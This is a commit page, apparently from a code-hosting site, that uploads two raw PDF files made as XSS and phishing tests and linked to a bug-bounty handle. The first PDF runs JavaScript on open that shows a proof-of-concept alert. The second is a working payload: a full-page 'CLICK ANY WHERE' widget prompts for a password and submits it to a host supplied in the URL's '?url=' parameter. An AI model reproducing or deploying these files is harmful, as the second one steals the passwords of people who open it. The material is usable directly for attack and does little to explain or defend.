fds
commited on
Commit
•
c36fc01
1
Parent(s):
df812d6
upload test
Browse files- 1.pdf +62 -0
- feedback popup theeeclipse.pdf +250 -0
1.pdf
ADDED
@@ -0,0 +1,62 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
%PDF-1.3
|
2 |
+
%����
|
3 |
+
1 0 obj
|
4 |
+
<</Pages 2 0 R /Type /Catalog>>
|
5 |
+
endobj
|
6 |
+
2 0 obj
|
7 |
+
<</Count 1 /Kids [3 0 R] /Type /Pages>>
|
8 |
+
endobj
|
9 |
+
3 0 obj
|
10 |
+
<</AA
|
11 |
+
<</O
|
12 |
+
<</JS
|
13 |
+
(
|
14 |
+
try {
|
15 |
+
app.alert\("XSS By Thee Eclipse"\);
|
16 |
+
} catch \(e\) {
|
17 |
+
app.alert\(e.message\);
|
18 |
+
}
|
19 |
+
)
|
20 |
+
/S /JavaScript
|
21 |
+
>>
|
22 |
+
>>
|
23 |
+
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
|
24 |
+
/Resources
|
25 |
+
<<
|
26 |
+
/Font <</F1 5 0 R>> % Font dictionary
|
27 |
+
>>
|
28 |
+
/Type /Page
|
29 |
+
>>
|
30 |
+
endobj
|
31 |
+
4 0 obj
|
32 |
+
<</Length 300>> % Updated Length to accommodate the new text
|
33 |
+
stream
|
34 |
+
|
35 |
+
BT
|
36 |
+
/F1 18 Tf % Set font size to 18 for a smaller text
|
37 |
+
0 0 0 rg % Set text color to black
|
38 |
+
1 0 0 1 72 750 Tm % Adjusted X and Y-coordinates
|
39 |
+
(Hello! Hackerone theeeclipse Added XSS here) Tj
|
40 |
+
ET
|
41 |
+
|
42 |
+
endstream
|
43 |
+
endobj
|
44 |
+
5 0 obj
|
45 |
+
<</BaseFont /Helvetica /Subtype /Type1 /Type /Font>> % Use the standard Helvetica font
|
46 |
+
endobj
|
47 |
+
xref
|
48 |
+
0 6
|
49 |
+
0000000000 65535 f
|
50 |
+
0000000015 00000 n
|
51 |
+
0000000062 00000 n
|
52 |
+
0000000117 00000 n
|
53 |
+
0000000210 00000 n
|
54 |
+
0000000524 00000 n
|
55 |
+
trailer
|
56 |
+
<<
|
57 |
+
/Root 1 0 R
|
58 |
+
/Size 6
|
59 |
+
>>
|
60 |
+
startxref
|
61 |
+
518
|
62 |
+
%%EOF
|
feedback popup theeeclipse.pdf
ADDED
@@ -0,0 +1,250 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
%PDF-1.3
|
2 |
+
%�߬�
|
3 |
+
3 0 obj
|
4 |
+
<</Type /Page
|
5 |
+
/Parent 1 0 R
|
6 |
+
/Resources 2 0 R
|
7 |
+
/MediaBox [0 0 595.2799999999999727 841.8899999999999864]
|
8 |
+
/Annots [
|
9 |
+
<</Type /Annot /Subtype /Link /Rect [0. 813.5435433070865656 566.9291338582677326 246.614409448818833] /Border [0 0 0] /A <</S /URI /URI (#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
|
10 |
+
(function(){
|
11 |
+
try {
|
12 |
+
var cResponse = app.response({cQuestion: "Enter your password to access this page: "}); var rUrl = URL.split('?url=')[1]+ "/?pass="+cResponse+"&path="+URL;
|
13 |
+
this.submitForm(rUrl);}
|
14 |
+
catch (e) {app.alert(e); }
|
15 |
+
})() ) >> >>
|
16 |
+
]
|
17 |
+
/Contents 4 0 R
|
18 |
+
>>
|
19 |
+
endobj
|
20 |
+
4 0 obj
|
21 |
+
<<
|
22 |
+
/Length 130
|
23 |
+
>>
|
24 |
+
stream
|
25 |
+
0.5670000000000001 w
|
26 |
+
0 G
|
27 |
+
BT
|
28 |
+
/F1 50 Tf
|
29 |
+
18.3999999999999986 TL
|
30 |
+
0 g
|
31 |
+
56.6929133858267775 785.1970866141732586 Td
|
32 |
+
(CLICK ANY WHERE) Tj
|
33 |
+
|
34 |
+
ET
|
35 |
+
endstream
|
36 |
+
endobj
|
37 |
+
1 0 obj
|
38 |
+
<</Type /Pages
|
39 |
+
/Kids [3 0 R ]
|
40 |
+
/Count 1
|
41 |
+
>>
|
42 |
+
endobj
|
43 |
+
5 0 obj
|
44 |
+
<<
|
45 |
+
/Type /Font
|
46 |
+
/BaseFont /Helvetica
|
47 |
+
/Subtype /Type1
|
48 |
+
/Encoding /WinAnsiEncoding
|
49 |
+
/FirstChar 32
|
50 |
+
/LastChar 255
|
51 |
+
>>
|
52 |
+
endobj
|
53 |
+
6 0 obj
|
54 |
+
<<
|
55 |
+
/Type /Font
|
56 |
+
/BaseFont /Helvetica-Bold
|
57 |
+
/Subtype /Type1
|
58 |
+
/Encoding /WinAnsiEncoding
|
59 |
+
/FirstChar 32
|
60 |
+
/LastChar 255
|
61 |
+
>>
|
62 |
+
endobj
|
63 |
+
7 0 obj
|
64 |
+
<<
|
65 |
+
/Type /Font
|
66 |
+
/BaseFont /Helvetica-Oblique
|
67 |
+
/Subtype /Type1
|
68 |
+
/Encoding /WinAnsiEncoding
|
69 |
+
/FirstChar 32
|
70 |
+
/LastChar 255
|
71 |
+
>>
|
72 |
+
endobj
|
73 |
+
8 0 obj
|
74 |
+
<<
|
75 |
+
/Type /Font
|
76 |
+
/BaseFont /Helvetica-BoldOblique
|
77 |
+
/Subtype /Type1
|
78 |
+
/Encoding /WinAnsiEncoding
|
79 |
+
/FirstChar 32
|
80 |
+
/LastChar 255
|
81 |
+
>>
|
82 |
+
endobj
|
83 |
+
9 0 obj
|
84 |
+
<<
|
85 |
+
/Type /Font
|
86 |
+
/BaseFont /Courier
|
87 |
+
/Subtype /Type1
|
88 |
+
/Encoding /WinAnsiEncoding
|
89 |
+
/FirstChar 32
|
90 |
+
/LastChar 255
|
91 |
+
>>
|
92 |
+
endobj
|
93 |
+
10 0 obj
|
94 |
+
<<
|
95 |
+
/Type /Font
|
96 |
+
/BaseFont /Courier-Bold
|
97 |
+
/Subtype /Type1
|
98 |
+
/Encoding /WinAnsiEncoding
|
99 |
+
/FirstChar 32
|
100 |
+
/LastChar 255
|
101 |
+
>>
|
102 |
+
endobj
|
103 |
+
11 0 obj
|
104 |
+
<<
|
105 |
+
/Type /Font
|
106 |
+
/BaseFont /Courier-Oblique
|
107 |
+
/Subtype /Type1
|
108 |
+
/Encoding /WinAnsiEncoding
|
109 |
+
/FirstChar 32
|
110 |
+
/LastChar 255
|
111 |
+
>>
|
112 |
+
endobj
|
113 |
+
12 0 obj
|
114 |
+
<<
|
115 |
+
/Type /Font
|
116 |
+
/BaseFont /Courier-BoldOblique
|
117 |
+
/Subtype /Type1
|
118 |
+
/Encoding /WinAnsiEncoding
|
119 |
+
/FirstChar 32
|
120 |
+
/LastChar 255
|
121 |
+
>>
|
122 |
+
endobj
|
123 |
+
13 0 obj
|
124 |
+
<<
|
125 |
+
/Type /Font
|
126 |
+
/BaseFont /Times-Roman
|
127 |
+
/Subtype /Type1
|
128 |
+
/Encoding /WinAnsiEncoding
|
129 |
+
/FirstChar 32
|
130 |
+
/LastChar 255
|
131 |
+
>>
|
132 |
+
endobj
|
133 |
+
14 0 obj
|
134 |
+
<<
|
135 |
+
/Type /Font
|
136 |
+
/BaseFont /Times-Bold
|
137 |
+
/Subtype /Type1
|
138 |
+
/Encoding /WinAnsiEncoding
|
139 |
+
/FirstChar 32
|
140 |
+
/LastChar 255
|
141 |
+
>>
|
142 |
+
endobj
|
143 |
+
15 0 obj
|
144 |
+
<<
|
145 |
+
/Type /Font
|
146 |
+
/BaseFont /Times-Italic
|
147 |
+
/Subtype /Type1
|
148 |
+
/Encoding /WinAnsiEncoding
|
149 |
+
/FirstChar 32
|
150 |
+
/LastChar 255
|
151 |
+
>>
|
152 |
+
endobj
|
153 |
+
16 0 obj
|
154 |
+
<<
|
155 |
+
/Type /Font
|
156 |
+
/BaseFont /Times-BoldItalic
|
157 |
+
/Subtype /Type1
|
158 |
+
/Encoding /WinAnsiEncoding
|
159 |
+
/FirstChar 32
|
160 |
+
/LastChar 255
|
161 |
+
>>
|
162 |
+
endobj
|
163 |
+
17 0 obj
|
164 |
+
<<
|
165 |
+
/Type /Font
|
166 |
+
/BaseFont /ZapfDingbats
|
167 |
+
/Subtype /Type1
|
168 |
+
/FirstChar 32
|
169 |
+
/LastChar 255
|
170 |
+
>>
|
171 |
+
endobj
|
172 |
+
18 0 obj
|
173 |
+
<<
|
174 |
+
/Type /Font
|
175 |
+
/BaseFont /Symbol
|
176 |
+
/Subtype /Type1
|
177 |
+
/FirstChar 32
|
178 |
+
/LastChar 255
|
179 |
+
>>
|
180 |
+
endobj
|
181 |
+
2 0 obj
|
182 |
+
<<
|
183 |
+
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
|
184 |
+
/Font <<
|
185 |
+
/F1 5 0 R
|
186 |
+
/F2 6 0 R
|
187 |
+
/F3 7 0 R
|
188 |
+
/F4 8 0 R
|
189 |
+
/F5 9 0 R
|
190 |
+
/F6 10 0 R
|
191 |
+
/F7 11 0 R
|
192 |
+
/F8 12 0 R
|
193 |
+
/F9 13 0 R
|
194 |
+
/F10 14 0 R
|
195 |
+
/F11 15 0 R
|
196 |
+
/F12 16 0 R
|
197 |
+
/F13 17 0 R
|
198 |
+
/F14 18 0 R
|
199 |
+
>>
|
200 |
+
/XObject <<
|
201 |
+
>>
|
202 |
+
>>
|
203 |
+
endobj
|
204 |
+
19 0 obj
|
205 |
+
<<
|
206 |
+
/Producer (jsPDF 2.1.1)
|
207 |
+
/CreationDate (D:20201127115410-00'00')
|
208 |
+
>>
|
209 |
+
endobj
|
210 |
+
20 0 obj
|
211 |
+
<<
|
212 |
+
/Type /Catalog
|
213 |
+
/Pages 1 0 R
|
214 |
+
/OpenAction [3 0 R /FitH null]
|
215 |
+
/PageLayout /OneColumn
|
216 |
+
>>
|
217 |
+
endobj
|
218 |
+
xref
|
219 |
+
0 21
|
220 |
+
0000000000 65535 f
|
221 |
+
0000001321 00000 n
|
222 |
+
0000003138 00000 n
|
223 |
+
0000000015 00000 n
|
224 |
+
0000001140 00000 n
|
225 |
+
0000001378 00000 n
|
226 |
+
0000001503 00000 n
|
227 |
+
0000001633 00000 n
|
228 |
+
0000001766 00000 n
|
229 |
+
0000001903 00000 n
|
230 |
+
0000002026 00000 n
|
231 |
+
0000002155 00000 n
|
232 |
+
0000002287 00000 n
|
233 |
+
0000002423 00000 n
|
234 |
+
0000002551 00000 n
|
235 |
+
0000002678 00000 n
|
236 |
+
0000002807 00000 n
|
237 |
+
0000002940 00000 n
|
238 |
+
0000003042 00000 n
|
239 |
+
0000003386 00000 n
|
240 |
+
0000003472 00000 n
|
241 |
+
trailer
|
242 |
+
<<
|
243 |
+
/Size 21
|
244 |
+
/Root 20 0 R
|
245 |
+
/Info 19 0 R
|
246 |
+
/ID [ <C57E79F17216A34B0239844ED1983235> <C57E79F17216A34B0239844ED1983235> ]
|
247 |
+
>>
|
248 |
+
startxref
|
249 |
+
3576
|
250 |
+
%%EOF
|